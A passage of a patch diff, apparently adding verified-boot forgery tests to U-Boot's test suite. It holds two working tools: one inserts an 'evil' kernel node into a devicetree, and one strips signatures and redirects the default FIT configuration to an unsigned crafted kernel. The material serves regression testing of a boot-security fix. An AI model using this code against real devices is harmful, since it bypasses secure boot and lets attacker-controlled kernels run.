# update the digest value + hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value' + dt_struct = change_property_value(dt_struct, dt_strings, hash_path, + kernel_digest) + + return dt_struct + +def add_evil_node(in_fname, out_fname, kernel_fname, attack): + """Add an evil node to the devicetree + + Args: + in_fname (str): Filename of input devicetree + out_fname (str): Filename to write modified devicetree to + kernel_fname (str): Filename of kernel data to add to evil node + attack (str): Attack type ('fakeroot' or 'kernel@') + + Raises: + ValueError: Unknown attack name + """ + if attack == 'fakeroot': + attack = FAKE_ROOT_ATTACK + elif attack == 'kernel@': + attack = KERNEL_AT + else: + raise ValueError('Unknown attack name!') + + with open(in_fname, 'rb') as fin: + input_data = fin.read() + + hdr = input_data[0:0x28] + + offset = 0 + magic = struct.unpack('>I', hdr[offset:offset + 4])[0] + if magic != MAGIC: + raise ValueError('Wrong magic!') + + offset += 4 + (totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36]) + + rsv_map = input_data[off_mem_rsvmap:off_dt_struct] + dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct] + dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings] + + with open(kernel_fname, 'rb') as kernel_file: + kernel_content = kernel_file.read() + + # computing inserted kernel hash + val = hashlib.sha1() + val.update(kernel_content) + hash_digest = val.digest() + + if attack == FAKE_ROOT_ATTACK: + dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + elif attack == KERNEL_AT: + dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + + # now rebuild the new file + size_dt_strings = len(dt_strings) + size_dt_struct = len(dt_struct) + totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings + off_mem_rsvmap = 0x28 + off_dt_struct = off_mem_rsvmap + len(rsv_map) + off_dt_strings = off_dt_struct + len(dt_struct) + + header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct, + off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) + + with open(out_fname, 'wb') as output_file: + output_file.write(header) + output_file.write(rsv_map) + output_file.write(dt_struct) + output_file.write(dt_strings) + +if __name__ == '__main__': + if len(sys.argv) != 5: + print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' % + sys.argv[0]) + print('valid attack names: [fakeroot, kernel@]') + sys.exit(1) + + in_fname, out_fname, kernel_fname, attack = sys.argv[1:] + add_evil_node(in_fname, out_fname, kernel_fname, attack) diff --git a/test/py/tests/vboot_forge.py b/test/py/tests/vboot_forge.py new file mode 100644 index 00000000000..b41105bd0e3 --- /dev/null +++ b/test/py/tests/vboot_forge.py @@ -0,0 +1,423 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com +# +# pylint: disable=E1101,W0201,C0103 + +""" +Verified boot image forgery tools and utilities + +This module provides services to both take apart and regenerate FIT images +in a way that preserves all existing verified boot signatures, unless you +manipulate nodes in the process. +""" + +import struct +import binascii +from io import BytesIO + +# +# struct parsing helpers +# + +class BetterStructMeta(type): + """ + Preprocesses field definitions and creates a struct.Struct instance from them + """ + def __new__(cls, clsname, superclasses, attributedict): + if clsname != 'BetterStruct': + fields = attributedict['__fields__'] + field_types = [_[0] for _ in fields] + field_names = [_[1] for _ in fields if _[1] is not None] + attributedict['__names__'] = field_names + s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types)) + attributedict['__struct__'] = s + attributedict['size'] = s.size + return type.__new__(cls, clsname, superclasses, attributedict) + +class BetterStruct(metaclass=BetterStructMeta): + """ + Base class for better structures + """ + def __init__(self): + for t, n in self.__fields__: + if 's' in t: + setattr(self, n, '') + elif t in ('Q', 'I', 'H', 'B'): + setattr(self, n, 0) + + @classmethod + def unpack_from(cls, buffer, offset=0): + """ + Unpack structure instance from a buffer + """ + fields = cls.__struct__.unpack_from(buffer, offset) + instance = cls() + for n, v in zip(cls.__names__, fields): + setattr(instance, n, v) + return instance + + def pack(self): + """ + Pack structure instance into bytes + """ + return self.__struct__.pack(*[getattr(self, n) for n in self.__names__]) + + def __str__(self): + items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None] + return '(' + ', '.join(items) + ')' + +# +# some defs for flat DT data +# + +class HeaderV17(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'magic'), + ('I', 'totalsize'), + ('I', 'off_dt_struct'), + ('I', 'off_dt_strings'), + ('I', 'off_mem_rsvmap'), + ('I', 'version'), + ('I', 'last_comp_version'), + ('I', 'boot_cpuid_phys'), + ('I', 'size_dt_strings'), + ('I', 'size_dt_struct'), + ] + +class RRHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('Q', 'address'), + ('Q', 'size'), + ] + +class PropHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'value_size'), + ('I', 'name_offset'), + ] + +# magical constants for DTB format +OF_DT_HEADER = 0xd00dfeed +OF_DT_BEGIN_NODE = 1 +OF_DT_END_NODE = 2 +OF_DT_PROP = 3 +OF_DT_END = 9 + +class StringsBlock: + """ + Represents a parsed device tree string block + """ + def __init__(self, values=None): + if values is None: + self.values = [] + else: + self.values = values + + def __getitem__(self, at): + if isinstance(at, str): + offset = 0 + for value in self.values: + if value == at: + break + offset += len(value) + 1 + else: + self.values.append(at) + return offset + + if isinstance(at, int): + offset = 0 + for value in self.values: + if offset == at: + return value + offset += len(value) + 1 + raise IndexError('no string found corresponding to the given offset') + + raise TypeError('only strings and integers are accepted') + +class Prop: + """ + Represents a parsed device tree property + """ + def __init__(self, name=None, value=None): + self.name = name + self.value = value + + def clone(self): + return Prop(self.name, self.value) + + def __repr__(self): + return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value)) + +class Node: + """ + Represents a parsed device tree node + """ + def __init__(self, name=None): + self.name = name + self.props = [] + self.children = [] + + def clone(self): + o = Node(self.name) + o.props = [x.clone() for x in self.props] + o.children = [x.clone() for x in self.children] + return o + + def __getitem__(self, index): + return self.children[index] + + def __repr__(self): + return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children)) + +# +# flat DT to memory +# + +def parse_strings(strings): + """ + Converts the bytes into a StringsBlock instance so it is convenient to work with + """ + strings = strings.split(b'\x00') + return StringsBlock(strings) + +def parse_struct(stream): + """ + Parses DTB structure(s) into a Node or Prop instance + """ + tag = bytearray(stream.read(4))[3] + if tag == OF_DT_BEGIN_NODE: + name = b'' + while b'\x00' not in name: + name += stream.read(4) + name = name.rstrip(b'\x00') + node = Node(name) + + item = parse_struct(stream) + while item is not None: + if isinstance(item, Node): + node.children.append(item) + elif isinstance(item, Prop): + node.props.append(item) + item = parse_struct(stream) + + return node + + if tag == OF_DT_PROP: + h = PropHeader.unpack_from(stream.read(PropHeader.size)) + length = (h.value_size + 3) & (~3) + value = stream.read(length)[:h.value_size] + prop = Prop(h.name_offset, value) + return prop + + if tag in (OF_DT_END_NODE, OF_DT_END): + return None + + raise ValueError('unexpected tag value') + +def read_fdt(fp): + """ + Reads and parses the flattened device tree (or derivatives like FIT) + """ + header = HeaderV17.unpack_from(fp.read(HeaderV17.size)) + if header.magic != OF_DT_HEADER: + raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER)) + # TODO: read/parse reserved regions + fp.seek(header.off_dt_struct) + structs = fp.read(header.size_dt_struct) + fp.seek(header.off_dt_strings) + strings = fp.read(header.size_dt_strings) + strblock = parse_strings(strings) + root = parse_struct(BytesIO(structs)) + + return root, strblock + +# +# memory to flat DT +# + +def compose_structs_r(item): + """ + Recursive part of composing Nodes and Props into a bytearray + """ + t = bytearray() + + if isinstance(item, Node): + t.extend(struct.pack('>I', OF_DT_BEGIN_NODE)) + if isinstance(item.name, str): + item.name = bytes(item.name, 'utf-8') + name = item.name + b'\x00' + if len(name) & 3: + name += b'\x00' * (4 - (len(name) & 3)) + t.extend(name) + for p in item.props: + t.extend(compose_structs_r(p)) + for c in item.children: + t.extend(compose_structs_r(c)) + t.extend(struct.pack('>I', OF_DT_END_NODE)) + + elif isinstance(item, Prop): + t.extend(struct.pack('>I', OF_DT_PROP)) + value = item.value + h = PropHeader() + h.name_offset = item.name + if value: + h.value_size = len(value) + t.extend(h.pack()) + if len(value) & 3: + value += b'\x00' * (4 - (len(value) & 3)) + t.extend(value) + else: + h.value_size = 0 + t.extend(h.pack()) + + return t + +def compose_structs(root): + """ + Composes the parsed Nodes into a flat bytearray instance + """ + t = compose_structs_r(root) + t.extend(struct.pack('>I', OF_DT_END)) + return t + +def compose_strings(strblock): + """ + Composes the StringsBlock instance back into a bytearray instance + """ + b = bytearray() + for s in strblock.values: + b.extend(s) + b.append(0) + return bytes(b) + +def write_fdt(root, strblock, fp): + """ + Writes out a complete flattened device tree (or FIT) + """ + header = HeaderV17() + header.magic = OF_DT_HEADER + header.version = 17 + header.last_comp_version = 16 + fp.write(header.pack()) + + header.off_mem_rsvmap = fp.tell() + fp.write(RRHeader().pack()) + + structs = compose_structs(root) + header.off_dt_struct = fp.tell() + header.size_dt_struct = len(structs) + fp.write(structs) + + strings = compose_strings(strblock) + header.off_dt_strings = fp.tell() + header.size_dt_strings = len(strings) + fp.write(strings) + + header.totalsize = fp.tell() + + fp.seek(0) + fp.write(header.pack()) + +# +# pretty printing / converting to DT source +# + +def as_bytes(value): + return ' '.join(["%02X" % x for x in value]) + +def prety_print_value(value): + """ + Formats a property value as appropriate depending on the guessed data type + """ + if not value: + return '""' + if value[-1] == b'\x00': + printable = True + for x in value[:-1]: + x = ord(x) + if x != 0 and (x < 0x20 or x > 0x7F): + printable = False + break + if printable: + value = value[:-1] + return ', '.join('"' + x + '"' for x in value.split(b'\x00')) + if len(value) > 0x80: + return '[' + as_bytes(value[:0x80]) + ' ... ]' + return '[' + as_bytes(value) + ']' + +def pretty_print_r(node, strblock, indent=0): + """ + Prints out a single node, recursing further for each of its children + """ + spaces = ' ' * indent + print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/'))) + for p in node.props: + print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value)))) + for c in node.children: + pretty_print_r(c, strblock, indent+1) + print((spaces + '};')) + +def pretty_print(node, strblock): + """ + Generates an almost-DTS formatted printout of the parsed device tree + """ + print('/dts-v1/;') + pretty_print_r(node, strblock, 0) + +# +# manipulating the DT structure +# + +def manipulate(root, strblock): + """ + Maliciously manipulates the structure to create a crafted FIT file + """ + # locate /images/kernel-1 (frankly, it just expects it to be the first one) + kernel_node = root[0][0] + # clone it to save time filling all the properties + fake_kernel = kernel_node.clone() + # rename the node + fake_kernel.name = b'kernel-2' + # get rid of signatures/hashes + fake_kernel.children = [] + # NOTE: this simply replaces the first prop... either description or data + # should be good for testing purposes + fake_kernel.props[0].value = b'Super 1337 kernel\x00' + # insert the new kernel node under /images + root[0].children.append(fake_kernel) + + # modify the default configuration + root[1].props[0].value = b'conf-2\x00' + # clone the first (only?) configuration + fake_conf = root[1][0].clone() + # rename and change kernel and fdt properties to select the crafted kernel + fake_conf.name = b'conf-2' + fake_conf.props[0].value = b'kernel-2\x00' + fake_conf.props[1].value = b'fdt-1\x00' + # insert the new configuration under /configurations + root[1].children.append(fake_conf) + + return root, strblock + +def main(argv): + with open(argv[1], 'rb') as fp: + root, strblock = read_fdt(fp) + + print("Before:") + pretty_print(root, strblock) + + root, strblock = manipulate(root, strblock) + print("After:") + pretty_print(root, strblock) + + with open('blah', 'w+b') as fp: + write_fdt(root, strblock, fp) + +if __name__ == '__main__': + import sys + main(sys.argv) +# EOF |